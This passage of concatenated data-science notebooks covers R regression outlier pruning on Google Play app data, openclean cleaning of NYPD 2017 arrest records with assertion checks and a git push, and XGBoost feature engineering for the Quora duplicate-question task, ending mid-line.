gplay_paid_data[c(-16, -23, -47),] gplay_paid_data <- gplay_paid_data[c(-20, -38, -41),] gplay_paid_data <- gplay_paid_data[c(-19, -36, -39),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- gplay_paid_data[c(-16, -23, -47),] gplay_paid_data <- gplay_paid_data[c(-20, -38, -41),] gplay_paid_data <- gplay_paid_data[c(-19, -36, -39),] gplay_paid_data <- gplay_paid_data[c(-35, -37, -4),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- gplay_paid_data[c(-16, -23, -47),] gplay_paid_data <- gplay_paid_data[c(-20, -38, -41),] gplay_paid_data <- gplay_paid_data[c(-19, -36, -39),] gplay_paid_data <- gplay_paid_data[c(-35, -37, -4),] gplay_paid_data <- gplay_paid_data[c(-34, -15, -7),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-6, -12, -29),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-5, -11, -27),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) panel.cor <- function(x,y,digits=2, prefix="", cex.cor,...) { usr <- par("usr"); on.exit(par(usr)) par(usr=c(0,1,0,1)) r <- abs(cor(x,y)) txt <- format(c(r,0.123456789),digits=digits)[1] txt <- paste0(prefix,txt) if(missing(cex.cor)) cex.cor <- 1.5/strwidth(txt) text(0.5,0.5,txt, cex=cex.cor*r) } # panel.cor 함수는 pairs 함수 사용할때 상관계수 크기에 따라 텍스트크기가 변하도록 해주는 사용자 정의 함수 # 우선 특정값의 평균을 나타내는 처음 10개변수의 설명변수와 class변수의 산점도 pairs(gplay_paid_data , lower.panel=function(x,y){ points(x,y); abline(lm(y ~ x), col='red') }, upper.panel = panel.cor ) gplay_paid_data <- gplay_paid_data %>% dplyr::select(-Installs) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) # panel.cor 함수는 pairs 함수 사용할때 상관계수 크기에 따라 텍스트크기가 변하도록 해주는 사용자 정의 함수 # 우선 특정값의 평균을 나타내는 처음 10개변수의 설명변수와 class변수의 산점도 pairs(gplay_paid_data , lower.panel=function(x,y){ points(x,y); abline(lm(y ~ x), col='red') }, upper.panel = panel.cor ) ```
github_jupyter
**Install openclean.** ``` pip install openclean-core ``` **Cloning the data from github repo.** ``` import os git_folder = 'NYC-Crime' if not os.path.isdir(git_folder): !git clone https://github.com/duketran1996/NYC-Crime.git else: %cd NYC-Crime/ !git pull %cd .. ``` **Important import. Run before executing the rest** ``` from openclean.cluster.knn import knn_clusters, knn_collision_clusters from openclean.function.similarity.base import SimilarityConstraint from openclean.function.similarity.text import LevenshteinDistance from openclean.function.token.ngram import NGrams from openclean.function.value.threshold import GreaterThan from openclean.operator.transform.update import update ``` **Data study: List number of columns.** ``` from openclean.pipeline import stream datafile = './NYC-Crime/sub-dataset/nypd_arrests_data_2017.csv' ds = stream(datafile) print('Schema\n------') for col in ds.columns: print(" '{}'".format(col)) print('\n{} rows.'.format(ds.count())) print("There are {} rows and {} columns in the dataset.".format(ds.count(),len(ds.columns))) ``` **Data study: Profile a sample of 10000 data to detect issues.** ``` from openclean.profiling.column import DefaultColumnProfiler profiles = ds.sample(n=10000, random_state=42).profile(default_profiler=DefaultColumnProfiler) profiles.stats() ``` **Data study: Perform a scan to check age group. No issues found.** ``` date = ds.distinct('AGE_GROUP') for i in date: print(i) ``` **Data study: Perform a scan to check date format. No issues found.** ``` date = ds.distinct('ARREST_DATE') import datetime def validate(date_text): try: datetime.datetime.strptime(date_text, '%m/%d/%Y') except ValueError: print(date_text) #raise ValueError("Incorrect data format, should be YYYY-MM-DD") for i in date: validate(i) ``` **Convert to data frame for fixing issues.** ``` fix = ds.to_df() ``` **Data Issues: In OFNS_DESC column, there are many repeated and miss spelling that needs to merge and fix. The impact with this change is later we would like to catergories offenses and have statistics on it.** ``` offense = ds.select('OFNS_DESC').distinct() clusters = knn_clusters( values=offense, sim=SimilarityConstraint(func=LevenshteinDistance(), pred=GreaterThan(0.7)), tokenizer=NGrams(n=4), minsize=2 ) for i in clusters: print(i) ``` **Data issues: Show RELATED OFFENSES spellings.** ``` offense = ds.select(['OFNS_DESC']).distinct() offense_val = [] for i in offense: if 'CRIMINAL MISCHIEF' in i: offense_val.append(i) print(i) ``` **Data fix: Change CRIMINAL MISCHIEF & RELATED OF to CRIMINAL MISCHIEF & RELATED OFFENSES** ``` offense_dict = { 'CRIMINAL MISCHIEF & RELATED OF': 'CRIMINAL MISCHIEF & RELATED OFFENSES' } fix = update(fix, columns='OFNS_DESC', func=offense_dict) ``` **Data fixed test: Test RELATED OFFENSES spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(offense_val)] assert all(check_fix['OFNS_DESC'] == 'CRIMINAL MISCHIEF & RELATED OFFENSES'), "RELATED OFFENSES spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: Show INTOXICATED spellings.** ``` offense = ds.select('OFNS_DESC').distinct() tox_val = [] for i in offense: if 'INTOXICATED' in i: tox_val.append(i) print(i) ``` **Data fix: Change INTOXICATED & IMPAIRED DRIVING, INTOXICATED/IMPAIRED DRIVING to INTOXICATED AND IMPAIRED DRIVING** ``` tox_dict = { 'INTOXICATED & IMPAIRED DRIVING': 'INTOXICATED AND IMPAIRED DRIVING', 'INTOXICATED/IMPAIRED DRIVING': 'INTOXICATED AND IMPAIRED DRIVING' } fix = update(fix, columns='OFNS_DESC', func=tox_dict) ``` **Data fixed test: Test INTOXICATED spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(['INTOXICATED AND IMPAIRED DRIVING'] + tox_val)] assert all(check_fix['OFNS_DESC'] == 'INTOXICATED AND IMPAIRED DRIVING'), "INTOXICATED spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: Show POSSESSION OF STOLEN PROPERTY spellings.** ``` offense = ds.select('OFNS_DESC').distinct() stolen_val = [] for i in offense: if 'POSSESSION' in i: stolen_val.append(i) print(i) ``` **Data fix: Change POSSESSION OF STOLEN PROPERTY 5 to POSSESSION OF STOLEN PROPERTY** ``` tox_dict = { 'POSSESSION OF STOLEN PROPERTY 5': 'POSSESSION OF STOLEN PROPERTY' } fix = update(fix, columns='OFNS_DESC', func=tox_dict) ``` **Data fixed test: Test POSSESSION OF STOLEN PROPERTY 5 spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(stolen_val)] assert all(check_fix['OFNS_DESC'] == 'POSSESSION OF STOLEN PROPERTY'), "POSSESSION OF STOLEN PROPERTY spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: Show OTHER STATE LAWS (NON PENAL LAW) spellings.** ``` offense = ds.select('OFNS_DESC').distinct() penal_val = [] for i in offense: if 'NON PENAL' in i: penal_val.append(i) print(i) ``` **Data fix: Change OTHER STATE LAWS (NON PENAL LA to OTHER STATE LAWS (NON PENAL LAW)** ``` penal_dict = { 'OTHER STATE LAWS (NON PENAL LA' : 'OTHER STATE LAWS (NON PENAL LAW)' } fix = update(fix, columns='OFNS_DESC', func=penal_dict) ``` **Data fixed test: Test OTHER STATE LAWS (NON PENAL LAW) spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(penal_val)] assert all(check_fix['OFNS_DESC'] == 'OTHER STATE LAWS (NON PENAL LAW)'), "OTHER STATE LAWS (NON PENAL LAW) spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: Show CHILD ABANDONMENT/NON SUPPORT spellings.** ``` offense = ds.select(['OFNS_DESC']).distinct() child_val = [] for i in offense: if 'CHILD ABANDONMENT' in i: child_val.append(i) print(i) ``` **Data fix: Change CHILD ABANDONMENT/NON SUPPORT 1 to CHILD ABANDONMENT/NON SUPPORT** ``` child_dict = { 'CHILD ABANDONMENT/NON SUPPORT 1': 'CHILD ABANDONMENT/NON SUPPORT' } fix = update(fix, columns='OFNS_DESC', func=child_dict) ``` **Data fixed test: Test CHILD ABANDONMENT/NON SUPPORT spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(child_val)] assert all(check_fix['OFNS_DESC'] == 'CHILD ABANDONMENT/NON SUPPORT'), "CHILD ABANDONMENT/NON SUPPORT spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: Show ADMINISTRATIVE spellings.** ``` offense = ds.select('OFNS_DESC').distinct() administrative_val = [] for i in offense: if 'ADMINISTRATIVE' in i: administrative_val.append(i) print(i) ``` **Data fix: Change ADMINISTRATIVE CODES to ADMINISTRATIVE CODE** ``` ad_dict = { 'ADMINISTRATIVE CODES': 'ADMINISTRATIVE CODE', } fix = update(fix, columns='OFNS_DESC', func=ad_dict) ``` **Data fixed test: Test ADMINSTRATIVE spellings** ``` check_fix = fix.loc[fix['OFNS_DESC'].isin(administrative_val)] assert all(check_fix['OFNS_DESC'] == 'ADMINISTRATIVE CODE'), "ADMINISTRATIVE spelling is not fixed: " + check_fix['OFNS_DESC'].unique() print("Successfully fixed: " + check_fix['OFNS_DESC'].unique()) ``` **Data issues: The borough of NYC that the arrest happen. The data K,M,B,Q,S is unclear to us.** ``` print(fix['ARREST_BORO'].unique()) ``` **Data fix: Change ambiguous abbreviation of column ARREST_BORO to full form.** ``` boro_dict = { 'B': 'Bronx', 'S': 'Staten Island', 'K': 'Brooklyn', 'M': 'Manhattan', 'Q': 'Queens', 'ARREST_BORO': 'ARREST_BORO' } fix = update(fix, columns='ARREST_BORO', func=boro_dict) ``` **Data fixed test: Test ARREST_BORO fixed data** ``` assert (sorted(fix['ARREST_BORO'].unique()) == sorted(boro_dict.values())), "ARREST_BORO is not fixed: " + fix['ARREST_BORO'].unique() print("Successfully fixed: " + fix['ARREST_BORO'].unique()) ``` **Data issues: The columns PERP_SEX and LAW_CAT_CD are also having values that is easier to read if written in full text instead of abbreviation.** ``` sex = ds.distinct('PERP_SEX') print(list(sex)) law_cat_cd = ds.distinct('LAW_CAT_CD') print(list(law_cat_cd)) ``` **Data fix: Change abbreviation of LAW_CAT_CD to long form.** ``` law_cat_cd_dict = { 'F': 'Felony', 'M': 'Misdemeanor', 'V': 'Violation', 'I': 'Traffic Infraction', '': 'Unknown', 'LAW_CAT_CD': 'LAW_CAT_CD' } fix = update(fix, columns='LAW_CAT_CD', func=law_cat_cd_dict) ``` **Data fixed test: Test LAW_CAT_CD fixed data** ``` assert (sorted(fix['LAW_CAT_CD'].unique()) == sorted(law_cat_cd_dict.values())), "LAW_CAT_CD is not fixed: " + fix['LAW_CAT_CD'].unique() print("Successfully fixed: " + fix['LAW_CAT_CD'].unique()) ``` **Data fix: Change abbreviation of PERP_SEX to long form.** ``` perp_sex_dict = { 'F': 'Female', 'M': 'Male', 'PERP_SEX': 'PERP_SEX' } fix = update(fix, columns='PERP_SEX', func=perp_sex_dict) ``` **Data fixed test: Test PERP_SEX fixed data** ``` assert (sorted(fix['PERP_SEX'].unique()) == sorted(perp_sex_dict.values())), "PERP_SEX is not fixed: " + fix['PERP_SEX'].unique() print("Successfully fixed: " + fix['PERP_SEX'].unique()) ``` **Data issues: There are unnecessary columns in our dataset that we don't care about such as X_COORD_CD and Y_COORD_CD which list midblock X and Y-coordinate for New York State Plane Coordinate System, Long Island Zone, NAD 83, units feet (FIPS 3104)** ``` display = ds.select(['X_COORD_CD','Y_COORD_CD']).to_df() display.head() ``` **Data fix: Our solution is to drop the columns.** ``` fix = fix.drop(columns=['X_COORD_CD', 'Y_COORD_CD']) ``` **Data fixed test: Test X_COORD_CD and YCOORD_CD dropped column** ``` assert (any(i not in fix.columns.values.tolist() for i in ['X_COORD_CD', 'Y_COORD_CD'])), "X_COORD_CD and Y_COORD_CD are not dropped" print("Successfully dropped: " + str(fix.columns.values.tolist())) ``` **Data issues: The data ASIAN / PACIFIC ISLANDER is better to be fix by removing space between / for easier comparison for analysis later on.** ``` race = ds.distinct('PERP_RACE') for i in race: print(i) ``` **Data fix: Remove space between ASIAN / PACIFIC ISLANDER.** ``` race_dict = { 'ASIAN / PACIFIC ISLANDER': 'ASIAN/PACIFIC ISLANDER' } fix = update(fix, columns='PERP_RACE', func=race_dict) ``` **Data fixed test: Test PERP_RACE fixed data** ``` assert ('ASIAN / PACIFIC ISLANDER' not in fix['PERP_RACE'].unique()), "ASIAN / PACIFIC ISLANDER is not fixed" print("Successfully fixed: " + fix['PERP_RACE'].unique()) ``` **Data issues: Found new issues with PD_DESC. Some spellings are incorrect. This also impacts as we want to catergorize the PD description to compare with the offense description.** ``` pd = ds.select('PD_DESC').distinct() clusters = knn_clusters( values=pd, sim=SimilarityConstraint(func=LevenshteinDistance(), pred=GreaterThan(0.9)), tokenizer=NGrams(n=4), minsize=2 ) for i in clusters: print(i) ``` **Only miss spelling one is considered to be fixed such as: ROBBERY,UNCLASSIFIED,OPEN AREAS, TRAFFIC,UNCLASSIFIED MISDEMEAN, ADM.CODE,UNCLASSIFIED VIOLATIO, TRAFFIC,UNCLASSIFIED INFRACTIO, NY STATE LAWS,UNCLASSIFIED FEL, IMPERSONATION 2, PUBLIC SERVAN, CRIMINAL DISPOSAL FIREARM 1 &, PROSTITUTION 3,PROMOTING BUSIN, CRIMINAL DISPOSAL FIREARM 1 &, GENERAL BUSINESS LAW,UNCLASSIFIED** ``` pd_desc = ds.select('PD_DESC').distinct() errors_list = ['ROBBERY,UNCLASSIFIED,OPEN AREA', 'TRAFFIC,UNCLASSIFIED MISDEMEAN', 'ADM.CODE,UNCLASSIFIED VIOLATIO', 'TRAFFIC,UNCLASSIFIED INFRACTIO', 'NY STATE LAWS,UNCLASSIFIED FEL', 'IMPERSONATION 2, PUBLIC SERVAN', 'CRIMINAL DISPOSAL FIREARM 1 &', 'PROSTITUTION 3,PROMOTING BUSIN', 'CRIMINAL DISPOSAL FIREARM 1 &', 'GENERAL BUSINESS LAW,UNCLASSIFIED'] for i in pd_desc: if any([e in i for e in errors_list]) : print(i) ``` **Data fix: Change spellings of ROBBERY,UNCLASSIFIED,OPEN AREAS, TRAFFIC,UNCLASSIFIED MISDEMEAN, ADM.CODE,UNCLASSIFIED VIOLATIO, TRAFFIC,UNCLASSIFIED INFRACTIO, NY STATE LAWS,UNCLASSIFIED FEL, IMPERSONATION 2, PUBLIC SERVAN, CRIMINAL DISPOSAL FIREARM 1 &** ``` mix_dict = { 'ROBBERY,UNCLASSIFIED,OPEN AREAS': 'ROBBERY,UNCLASSIFIED,OPEN AREA', 'TRAFFIC,UNCLASSIFIED MISDEMEAN': 'TRAFFIC,UNCLASSIFIED MISDEMEANOR', 'ADM.CODE,UNCLASSIFIED VIOLATIO': 'ADM.CODE,UNCLASSIFIED VIOLATION', 'TRAFFIC,UNCLASSIFIED INFRACTIO': 'TRAFFIC,UNCLASSIFIED INFRACTION', 'NY STATE LAWS,UNCLASSIFIED FEL': 'NY STATE LAWS,UNCLASSIFIED FELONY', 'IMPERSONATION 2, PUBLIC SERVAN': 'IMPERSONATION 2, PUBLIC SERVANT', 'CRIMINAL DISPOSAL FIREARM 1 &': 'CRIMINAL DISPOSAL FIREARM 1', 'PROSTITUTION 3,PROMOTING BUSIN': 'PROSTITUTION 3,PROMOTING BUSINESS', 'GENERAL BUSINESS LAW,UNCLASSIFIED': 'GENERAL BUSINESS LAW / UNCLASSIFIED' } fix = update(fix, columns='PD_DESC', func=mix_dict) ``` **Data fixed test: Test PD_DESC fixed data** ``` check_fix = fix[fix['PD_DESC'].str.contains('|'.join(mix_dict.values()))] assert (any(i not in check_fix['PD_DESC'].unique() for i in mix_dict.keys())), "PD_DESC is not fixed: " + check_fix['PD_DESC'].unique() print("Successfully fixed: " + check_fix['PD_DESC'].unique()) ``` **Only miss spelling one is considered to be fixed such as: CONTROLLED SUBSTANCE, POSSESSI, CONTROLLED SUBSTANCE, INTENT T, CONTROLLED SUBSTANCE,POSSESS., and spaces between CONTROLLED SUBSTANCE, SALE** ``` pd_desc = ds.select('PD_DESC').distinct() for i in pd_desc: if 'CONTROLLED SUBSTANCE,' in i: print(i) ``` **Data fix: Change spacing in SALE and spelling to POSSESSION and INTENT** ``` control_dict = { 'CONTROLLED SUBSTANCE, POSSESSI': 'CONTROLLED SUBSTANCE, POSSESSION', 'CONTROLLED SUBSTANCE,POSSESS. OF PROCURSERS': 'CONTROLLED SUBSTANCE, POSSESSION OF PROCURSERS', 'CONTROLLED SUBSTANCE,POSSESS. 1': 'CONTROLLED SUBSTANCE, POSSESSION 1', 'CONTROLLED SUBSTANCE,POSSESS. 2': 'CONTROLLED SUBSTANCE, POSSESSION 2', 'CONTROLLED SUBSTANCE,POSSESS. 3': 'CONTROLLED SUBSTANCE, POSSESSION 3', 'CONTROLLED SUBSTANCE,INTENT TO SELL 3': 'CONTROLLED SUBSTANCE, INTENT TO SELL 3', 'CONTROLLED SUBSTANCE,SALE 1': 'CONTROLLED SUBSTANCE, SALE 1', 'CONTROLLED SUBSTANCE,SALE 2': 'CONTROLLED SUBSTANCE, SALE 2', 'CONTROLLED SUBSTANCE,SALE 3': 'CONTROLLED SUBSTANCE, SALE 3', } fix = update(fix, columns='PD_DESC', func=control_dict) ``` **Data fixed test: Test PD_DESC fixed data** ``` check_fix = fix[fix['PD_DESC'].str.contains('CONTROLLED SUBSTANCE,')] assert (any(i not in check_fix['PD_DESC'].unique() for i in control_dict.keys())), "PD_DESC is not fixed: " + check_fix['PD_DESC'].unique() print("Successfully fixed: " + check_fix['PD_DESC'].unique()) ``` **Only fix DRUG spelling** ``` pd_desc = ds.select('PD_DESC').distinct() for i in pd_desc: if 'IMPAIRED DRIVING' in i: print(i) ``` **Data fix: Fix DRUG spelling.** ``` impair_dict = { 'IMPAIRED DRIVING, DRUGS': 'IMPAIRED DRIVING / DRUG', 'IMPAIRED DRIVING,DRUG': 'IMPAIRED DRIVING / DRUG', 'IMPAIRED DRIVING,ALCOHOL': 'IMPAIRED DRIVING / ALCOHOL' } fix = update(fix, columns='PD_DESC', func=impair_dict) ``` **Data fixed test: Test PD_DESC fixed data** ``` check_fix = fix[fix['PD_DESC'].str.contains('IMPAIRED DRIVING')] assert (all(i not in check_fix['PD_DESC'].unique() for i in impair_dict.keys())), "PD_DESC is not fixed: " + check_fix['PD_DESC'].unique() print("Successfully fixed: " + check_fix['PD_DESC'].unique()) ``` **Finalize data set: Save data clean file to csv file for analysis.** ``` import os existing_file = './NYC-Crime/clean-dataset/nypd_arrest_data_clean_2017.csv' if os.path.isdir(existing_file): !rm $existing_file fix.to_csv(r'./NYC-Crime/clean-dataset/nypd_arrest_data_clean_2017.csv') ``` **Update clean dataset 2017 to Github repo.** ``` %cd NYC-Crime/ !git config --global user.email "email" !git config --global user.name "username" !git add . !git commit -m 'fix: update clean dataset 2017' !git status ``` **Assign github credentials** ``` !git remote add colab https://username:access_token@github.com/duketran1996/NYC-Crime.git ``` **Push file changes** ``` !git push -u colab main ``` **Remove Github repo folder** ``` %cd ../ !rm -r NYC-Crime ```
github_jupyter
``` import pandas as pd import numpy as np import nltk import multiprocessing import difflib import time import gc import xgboost as xgb import warnings warnings.filterwarnings('ignore') from collections import Counter from sklearn.metrics import log_loss from scipy.optimize import minimize from sklearn.cross_validation import train_test_split from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer from scipy.spatial.distance import cosine, correlation, canberra, chebyshev, minkowski, jaccard, euclidean from models_utils_xgb import * def get_test(): feats_src = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/data/features/uncleaned/' feats_src2 = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/data/features/NER/' keras_q1 = np.load(feats_src2 + 'q1test_NER_128len.npy') keras_q2 = np.load(feats_src2 + 'q2test_NER_128len.npy') xgb_feats = pd.read_csv(feats_src + '/the_1owl/owl_test.csv') abhishek_feats = pd.read_csv(feats_src + 'abhishek/test_features.csv', encoding = 'ISO-8859-1').iloc[:, 2:] text_feats = pd.read_csv(feats_src + 'other_features/text_features_test.csv', encoding = 'ISO-8859-1') img_feats = pd.read_csv(feats_src + 'other_features/img_features_test.csv') srk_feats = pd.read_csv(feats_src + 'srk/SRK_grams_features_test.csv') mephisto_feats = pd.read_csv('../../data/features/lemmatized_fullclean/test_mephistopeheles_features.csv').iloc[:, 6:] turkewitz_feats = pd.read_csv('../../data/features/lemmatized_fullclean/test_turkewitz_features_fullcleanSTEMMED.csv') turkewitz_feats = turkewitz_feats[['q1_freq', 'q2_freq']] turkewitz_feats['freq_sum'] = turkewitz_feats.q1_freq + turkewitz_feats.q2_freq turkewitz_feats['freq_diff'] = turkewitz_feats.q1_freq - turkewitz_feats.q2_freq turkewitz_feats['freq_mult'] = turkewitz_feats.q1_freq * turkewitz_feats.q2_freq turkewitz_feats['freq_div'] = turkewitz_feats.q1_freq / turkewitz_feats.q2_freq xgb_feats.drop(['z_len1', 'z_len2', 'z_word_len1', 'z_word_len2'], axis = 1, inplace = True) xgb_feats = xgb_feats.iloc[:, 5:] df = pd.concat([xgb_feats, abhishek_feats, text_feats, img_feats, turkewitz_feats, mephisto_feats], axis = 1) del xgb_feats, abhishek_feats, text_feats, img_feats, turkewitz_feats, mephisto_feats gc.collect() df = drop_duplicate_cols(df) keras_q1 = pd.DataFrame(keras_q1) keras_q2 = pd.DataFrame(keras_q2) keras_q1.columns = ['question1_{}'.format(i) for i in range(keras_q1.shape[1])] keras_q2.columns = ['question2_{}'.format(i) for i in range(keras_q2.shape[1])] X = pd.concat([keras_q1, keras_q2, df], axis = 1) colnames_list = X.columns.tolist() colnames_list[300] = 'len_char_q1_other' colnames_list[301] = 'len_char_q2_other' X.columns = colnames_list print('Test data shape:', X.shape) X = X.astype('float32') return X def predict_test(X_test, model_name): print('Predicting on test set.') gbm = xgb.Booster(model_file = 'saved_models/XGB/{}.txt'.format(model_name)) X_test = xgb.DMatrix(X_test) test_preds = gbm.predict(X_test) sub_src = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/submissions/' sample_sub = pd.read_csv(sub_src + 'sample_submission.csv') sample_sub['is_duplicate'] = test_preds sample_sub.is_duplicate = sample_sub.is_duplicate.apply(transform) sample_sub.to_csv(sub_src + '{}.csv'.format(model_name), index = False) return def get_transformations_features(transformations_src, mode = 'train'): print('Adding features based on data transformations.') lsa10tr_3grams_q1 = np.load(transformations_src + '{}_lsa10_3grams.npy'.format(mode))[0] lsa10tr_3grams_q2 = np.load(transformations_src + '{}_lsa10_3grams.npy'.format(mode))[1] transforms_feats = pd.DataFrame() transforms_feats['cosine'] = [cosine(x, y) for (x,y) in zip(lsa10tr_3grams_q1, lsa10tr_3grams_q2)] transforms_feats['correlation'] = [correlation(x, y) for (x,y) in zip(lsa10tr_3grams_q1, lsa10tr_3grams_q2)] transforms_feats['jaccard'] = [jaccard(x, y) for (x,y) in zip(lsa10tr_3grams_q1, lsa10tr_3grams_q2)] transforms_feats['euclidean'] = [euclidean(x, y) for (x,y) in zip(lsa10tr_3grams_q1, lsa10tr_3grams_q2)] transforms_feats['minkowski'] = [minkowski(x, y, 3) for (x,y) in zip(lsa10tr_3grams_q1, lsa10tr_3grams_q2)] return transforms_feats def get_doc2vec_features(doc2vec_src, mode = 'train'): print('Adding features based on Doc2Vec distances.') doc2vec_pre_q1 = np.load(doc2vec_src + '{}_q1_doc2vec_vectors_pretrained.npy'.format(mode)) doc2vec_pre_q2 = np.load(doc2vec_src + '{}_q2_doc2vec_vectors_pretrained.npy'.format(mode)) doc2vec_quora_q1 = np.load(doc2vec_src + '{}_q1_doc2vec_vectors_trainquora.npy'.format(mode)) doc2vec_quora_q2 = np.load(doc2vec_src + '{}_q2_doc2vec_vectors_trainquora.npy'.format(mode)) d2v_feats_pretrained = pd.DataFrame() d2v_feats_pretrained['cosine'] = [cosine(x, y) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_pretrained['correlation'] = [correlation(x, y) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_pretrained['jaccard'] = [jaccard(x, y) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_pretrained['euclidean'] = [euclidean(x, y) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_pretrained['minkowski'] = [minkowski(x, y, 3) for (x,y) in zip(doc2vec_pre_q1, doc2vec_pre_q2)] d2v_feats_quora = pd.DataFrame() d2v_feats_quora['cosine'] = [cosine(x, y) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] d2v_feats_quora['correlation'] = [correlation(x, y) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] d2v_feats_quora['jaccard'] = [jaccard(x, y) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] d2v_feats_quora['euclidean'] = [euclidean(x, y) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] d2v_feats_quora['minkowski'] = [minkowski(x, y, 3) for (x,y) in zip(doc2vec_quora_q1, doc2vec_quora_q2)] return d2v_feats_pretrained, d2v_feats_quora def labelcount_encode(df2, cols): df = df2.copy() categorical_features = cols new_df = pd.DataFrame() for cat_feature in categorical_features: cat_feature_value_counts = df[cat_feature].value_counts() value_counts_list = cat_feature_value_counts.index.tolist() value_counts_range_rev = list(reversed(range(len(cat_feature_value_counts)))) # for ascending ordering value_counts_range = list(range(len(cat_feature_value_counts))) # for descending ordering labelcount_dict = dict(zip(value_counts_list, value_counts_range)) new_df[cat_feature] = df[cat_feature].map(labelcount_dict) return new_df def count_encode(df2, cols): df = df2.copy() categorical_features = cols new_df = pd.DataFrame() for i in categorical_features: new_df[i] = df[i].astype('object').replace(df[i].value_counts()) return new_df def bin_numerical(df2, cols, step): df = df2.copy() numerical_features = cols new_df = pd.DataFrame() for i in numerical_features: feature_range = np.arange(0, np.max(df[i]), step) new_df[i] = np.digitize(df[i], feature_range, right=True) return new_df def drop_duplicate_cols(df): dfc = df.iloc[0:10000,:] dfc = dfc.T.drop_duplicates().T duplicate_cols = sorted(list(set(df.columns).difference(set(dfc.columns)))) print('Dropping duplicate columns:', duplicate_cols) df.drop(duplicate_cols, axis = 1, inplace = True) print('Final shape:', df.shape) del dfc gc.collect() return df def get_new_feats(): print('Creating additional grouping features.') turkewitz_feats = pd.read_csv('/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/data/features/lemmatized_fullclean/test_turkewitz_features_fullcleanSTEMMED.csv') turkewitz_feats = turkewitz_feats[['q1_freq', 'q2_freq']] ff1 = turkewitz_feats.groupby(['q2_freq'])['q1_freq'].transform('sum') ff2 = turkewitz_feats.groupby(['q1_freq'])['q2_freq'].transform('sum') ff1 = ff1 / np.max(ff1) ff2 = ff2 / np.max(ff2) ff1m = turkewitz_feats.groupby(['q2_freq'])['q1_freq'].transform('mean') ff2m = turkewitz_feats.groupby(['q1_freq'])['q2_freq'].transform('mean') ff1m = ff1m / np.max(ff1m) ff2m = ff2m / np.max(ff2m) gr_feats = pd.DataFrame() gr_feats['ff1'] = ff1 gr_feats['ff2'] = ff2 gr_feats['ff1m'] = ff1m gr_feats['ff2m'] = ff2m test_c = count_encode(turkewitz_feats, ['q1_freq', 'q2_freq']) test_c.q1_freq = test_c.q1_freq / np.max(test_c.q1_freq) test_c.q2_freq = test_c.q2_freq / np.max(test_c.q2_freq) test_c.rename(columns = {'q1_freq': 'q1_freq_normalized', 'q2_freq': 'q2_freq_normalized'}, inplace = True) src = '/media/w/1c392724-ecf3-4615-8f3c-79368ec36380/DS Projects/Kaggle/Quora/scripts/features/' network_feats = pd.read_csv(src + 'test_networkfeats_fullclean.csv') textacy1_feats = 